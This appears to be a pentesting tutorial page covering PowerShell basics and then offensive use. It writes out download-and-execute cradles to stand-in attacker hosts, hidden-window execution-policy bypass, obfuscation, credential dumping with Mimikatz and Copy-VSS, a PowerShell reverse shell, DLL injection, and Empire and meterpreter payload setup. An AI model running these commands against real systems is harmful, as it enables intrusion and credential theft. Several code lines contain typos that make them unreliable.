PowerShell for Pentesters

What is Powershell?

Powershell is a powerful built-in CLI or "shell" also task-orientes scripting language
Mostly used by admins
Built on top of .NET
Scripts end with ".ps1"
Version 5.0 onward introduce some hurdles regarding logging and restrictive modes
Powershell 6.0 is available MacOS and Linux also as Docker image

Fundamentals

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe where exe files of powershell stays. for 64-bit it stays under system32 directory. C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe for 32-bit it stays in C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

#You can learn like that
PS C:\Windows\system32\WindowsPowerShell\v1.0> [Environment]::Is64BitProcess
True

You can learn detail with command below

C:\> powershell /?

Execution Policy

powershell.exe -ExecutionPolicy Bypass ./shell.ps1
powershell.exe -ExecutionPolicy Unrestricted ./shell.ps1
powershell.exe -Command Get-Process
powershell.exe -Command "& {Get-Eventlog -Logname security}"

EncodedCommand: Used to executed base64 command

powershell.exe -EncodedCommand $encodedCommand

Like Man pages you can reach Get-Help section of all commands
- Get-Help Get-Help
- Get-Help Get-Process -Full Gives full result regarding that command
- Get-Help Get-Process -Examples you can learn examples of that commands You can updata man pages with Update-Help command
You can learn commands by tunning the command so you don't need to memorize alll. Get-Commands -Name *Log*

Cmdlets

You can change formats of command results
- For ex. Get-Childitem | Format-List *
After learning all these commands you can pipe them to get objects
- For ex. Get-Childitem | Sort-Object -Unique | Select-Object Basename
Redirection works as same like in other OS {<,>}
You can use different format also
- Get-Process notepad | Format-List Path
- or even
- Get-Process notepad | Format-List Path,Id,ProcessName
Get-WmiObject -class win32_operatingsystem | Select -Property *
We can use fl as alias to Format-List
If you want to you create csv file you can use Export-Csv
- Get-WmiObject -Class win32_service | Select-Object Name, ProcessID | export-csv C:\Users\public\Documents\try.csv
In order to see Registry hives
cd HKLM:\
Select-String is important command
- Select-String -Path C:\Users\public\Documents\*.txt -Pattern yoursearch*
Get-Content
- cat = Get-Content
To learn servises which are running and available
- Get-Service
- Get-Service | Select-Object Name
- Get-Service "n*" | Sort-Object status -Descending

Modules

Modules can contain powershell scripts and code files. And they are in directories.
Modules are importet powershell session.
To obtain list currently imported modules Get-Module
Get-Module -ListAvailable we can learn all modules that we can import.
In order to import module Import-Module .\new_module.psm1
$Env:PSModulePath should include the module that we need to import
You need to create a directory inside one of these paths and upload all files in that directory.
After uploading these files in that directory run basically
- Import-Module ModuleName and confirm it Get-Module
- Then you can learn module commands by running Get-Command -Module AADInternals
- To Learn one command Get-Help Add-AADIntEASDevice

Scripts

Intro for Scripts

PowerShell Scripts end with .\ps1
1 refer not to a version but PowerShell engine itself
In order to run script just .\script.ps1

Param([parameter (mandatory=$true)][string]$file)
Get-Content "$file"

That script takes an argument and later write content of it. or you can put a variable inside that parameter like $file= try.txt Get-Content $file

Loop Statements

for()
foreach()
while()
do {something}while()
do {something}until)()
Learn details with

    Get-Help about_Foreach
    Get-Help about_For
    Get-Help about_Do
    Get-Help about_While

Examples
- Foreach()

        $services = Get-Service
        foreach ($i in $services){ $i.Name }

  or also 

  `Get-Service | ForEach-Object {$_.Name}` here $_ is giving you ability to iterate it.

Where-Object

it gives you ability to find values
- Get-ChildItem C:\Users\ | Where-Object {$_.Name -match "public"}

$ports = {444,81}
$ip = "127.0.0.1"
foreach ($port in $ports) {try{$socket=New-Object System.Net.Sockets.TcpClient($ip,$port);} catch{}; if($socket -eq $null) {echo $ip":"$port" - Closed ";} else{echo $ip":"$port - "Open"; $socket - $null;}}

Objects

We can learn objects Get-Process | Get-Member -MemberType Method Get-Process -Name "chrome" | Kill
Also with New-Object creating .Net Framework object or COM object is possible

Creating new object based on .NET class

$webclient = New-Object System.Net.WebClient
$url = "https://domain.example.com/malicious.exe"
$file = "C:\ProgramData\malicious.exe"
$webclient.DownloadFile($url,$file)

Here webclient is a class from .NET class and that class Download file method works with two variable.

Offensive PowerShell

Downloading and Executing

There are two ways of downloading and executing files in PowerShell, .Net classes and Com objects
- one which is downloaded to disk
- second is run in within PowerShell process memory without touching the disk

Powershell

Com

Net.WebClient DownloadString Method

Word.AppIication COM Object

Net.WebClient DownloadData Method

nternetExplorer.Application COM Object

Net.WebCIient OpenRead method

MsXmI2.Servee

.NET [Net.HttpWebRequest] class - Certutil.exe w/ -ping argument

Excel.Application COM Object

Disk-Based Execution Net.Webclient DownloadFile method BITSAdmin.exe Certutil.exe w/ -urlcache argument

Some Methods

Net.WebClient DownloadString Method

iex (New-Object Net.WebClient).DownloadString("https://example.com/try.ps1")

Same command from shell

powershell.exe iex (New-Object Net.WebClient).DownloadString(`https://example.com/try.ps1`)

or you can part it

$dl = New-Objet System.Net.Webclient
$pl = "http://example.com/here.ps1"
$cmd= $dl.DownloadString($pl)
Invoke-Expression $cmd

Here we downloading and running it inside powershell memory so not putting it any disk. Even file extension will be different from ps1 like gif for ex, powershell will run it ps1 file.

It is possible to create headers in Net.WebClient

$dl = New-Objet System.Net.Webclient
$dl.Headers.Add("user agent", "Mozilla/5.0")
$pl = "http://example.com/here.ps1"
$cmd= $dl.DownloadString($pl)
Invoke-Expression $cmd

Net.WebClient DownloadFile Method

This method will download your executable to disk. If you are trying to be stealthy not recommended.

$dl = New-Objet System.Net.Webclient
$pl = "http://example.com/exploit.exe"
$local_file = "C:\users\public\exploit.exe"
$cmd= $dl.DownloadFile($pl,$local_file)
Invoke-Expression $cmd

Net.WebRequest

For downloading and executing in memory we can use it.

$get = [System.Net.NebRequest]::Create("http://example/try.psl")
$res = $get.GetResponse()
iex ([System.IO.StreamReader] ($res.GetResponseStreamU)) .ReadToEnd()

System.Xml.XmlDocument

you can run commands by serving xml in attacker computer.

<?xml version="1.0"?>
    <command>
        <here>
            <execute>Get-Process</execute>
        </here>
    </command>

Sxmldoc = New-Object System.Xml.XmlDocument
$xmldoc.Load("http://attacker.com/command.xml")
iex $xmldoc.command.here.execute

Com O?bject Download scripts

$downloader = New-Object -ComObject Msxml2.XMLHTTP
$downloader.open(“GET”, “http://attacker.com/script.psl”, Sfalse)
$downloader.send()
iex $downloader.responseText

Sdownloader = New-Object -ComObject WinHttp.WinHttpRequest.5.1
$downloader.open(“GET”, “http://attacker.com/script.psl”, Sfalse)
$downloader.send()
iex $downloader.responseText

We can use as one liner these codes with semicolon ;


$der = New-Object -ComObject Msxml2.XMLHTTP; $der.open(“GET”, “http://attacker.com/script.psl”, Sfalse); $der.send(); iex $der.responseText

ExecutionPolicy Bypass and Hidden Window

This will hide our scripts from enduser.


powershell.exe -ExecutionPolicy bypass -window hiden .\run.ps1

Here is a download cradle link

Obfuscation

Invoke-Obfuscation

You can directly download the master from here.

After putting that file into modules directory, find module path with that command $env:PSModulePath Then run that command Import-Module Invoke-Obfuscation. If you get some error please be sure all files are extracted. Real time protection in windows can be blocked all files to be extracted.

Here there are some commands that you can use.

First SET SCRIPTBLOCK

SET SCRIPTBLOCK iex (New-Object Net.Webclient).downloadstring("https://127.0.0.1/try.ps1")

After saying the invoke-obfuscate the things that we want to obusficate we need to select STRING method, 3 will make it reverse.

STRING/3

Here we can take the result section and run that in powershell. It will execute it.

There is also other sections in the tool.

By using encoding section ENCODING/7

We are taking really long obfuscated command. We should take the result and run in the machine it self. In CMD you should use powershell -Command "<RESULT>"

There is also LAUNCHER module too.

Here you can use based on which launcher you can choose yours.

Information Gathering and Recon

PowerSploit is one of tools that we can use on that purpose.

After downloading it inside module directory, you can run portscan command.

Invoke-Portscan -Hosts "127.0.0.1" -PingOnly

Invoke-Portscan -Hosts 127.0.0.1 -Ports "53-81"

Get-HttpStatus we can learn about sub directories of webserver

Get-HttpStatus -Target 127.0.0.1 -Path C:\users\public\dic.txt -Port 80 | ? {$_.Status -match "ok"}

Post-Exploitation with PowerShell

Nishang

We should upload that module to our attacker system.

There are some modules in that tool.

Gather

That Module will attempt to copy SAM database using VSS service, NTDS.dit and system registry files will be tried to copied by tool.

iex (New-Object Net.Webclient).DownloadString('https://attacker.com/Copy-VSS.ps1'); Copy-VSS

Also inside Gather module there is lots of command that you cant use.

Or you can directly try to download from github repository.

iex (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Get-Information.ps1"); Get-Information

iex (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Get-PassHints.ps1"); Get-PassHints

or you can run Mimikatz on that machine

iex (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Invoke-Mimikatz.ps1"); Invoke-Mimikatz -DumpCreds

In windows machines sometimes it can be problem to create reverse shells, but in that tool it is possible to create by Invoke-PowershellTcp

iex (New-Object Net.Webclient).DownloadString("https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1"); Invoke-PowerShellTcp -Reverse -IPAddress 127.0.0.1 -Port 4444

PowerSploit

PrivEsc

After downloading the powersploit into machine you can go to PrivEsc directory and

Import-Module ./Privesc.psm1
Get-Command -Module Privesc #learn all commands regarding privesc
Invoke-AllChecks

# Dll injection example before that create dll with msfvenom
iex (New-Object Net.WebClient).DownloadString("https://atacker.com/Invoke-DLLInjection.ps1"); Invoke-DLLInjection -ProcessID 5430 C:\program\cmd.dll

Empire

Empire is a post-exploitation framework.

Basic usage of Empire

(Empire: listeners) > uselistener http

(Empire: uselistener/http) > set Name turm
[*] Set Name to turm
(Empire: uselistener/http) > set Host http://192.168.101.147
[*] Set Host to http://192.168.101.147
(Empire: uselistener/http) > set Port 4321
[*] Set Port to 4321
(Empire: uselistener/http) > execute

After that we should go to stager module

(Empire: uselistener/http) > usestager windows/launcher_bat
(Empire: usestager/windows/launcher_bat) > set Listener turm
[*] Set Listener to turm
(Empire: usestager/windows/launcher_bat) > set OutFile var/lib/powershell-empire/empire/client/generated-stagers/turm.bat
[*] Set OutFile to var/lib/powershell-empire/empire/client/generated-stagers/turm.bat
(Empire: usestager/windows/launcher_bat) > execute
[+] turm.bat written to /var/lib/powershell-empire/empire/client/generated-stagers/turm.bat
(Empire: usestager/windows/launcher_bat) >

after running commands on victim machine we should have a active agent

(Empire: agents) > agents

┌Agents─────────┬────────────┬─────────────────┬───────────────────────┬────────────┬──────┬───────┬─────────────────────────┬──────────┐
│ ID │ Name     │ Language   │ Internal IP     │ Username              │ Process    │ PID  │ Delay │ Last Seen               │ Listener │
├────┼──────────┼────────────┼─────────────────┼───────────────────────┼────────────┼──────┼───────┼─────────────────────────┼──────────┤
│ 1  │ LTZSRUKW │ powershell │ 192.168.101.129 │ DESKTOP-FQKN1TQ\turme │ powershell │ 4020 │ 5/0.0 │ 2022-12-26 19:00:40 EST │ turm     │
│    │          │            │                 │                       │            │      │       │ (2 seconds ago)         │          │
└────┴──────────┴────────────┴─────────────────┴───────────────────────┴────────────┴──────┴───────┴─────────────────────────┴──────────┘

(Empire: agents) >interact LTZSRUKW

We can do privilege escalation control after that.

sudo apt install powershell-empire

After pushing entering

Some Commands that you will use during powershell-Metasploit Usage

# Metasploit multi/handler
use exploit/multi/handler
set payload windows/x64/meterpreter_reverse_https
set LHOST IP.IP.IP.IP
set LPORT ...
exploit -j 

# Creating payload with msfvenom for powershell
msfvenom -p windows/x64/meterpreter_reverse_https lport=... lhost=IP.IP.IP.IP -f psh-reflection > payload.ps1

# On victim run and execute
powershell.exe iex (New-Object Net.Webclient).DownloadString("https://IP.IP.IP.IP/payload.ps1")

########### After taking shell with meterpreter

load powershell 
powershell_shell #powershell will be executed and later you can download mimikatz.

Previouswhoami NextAzure AD Penetration Test

Last updated 2 years ago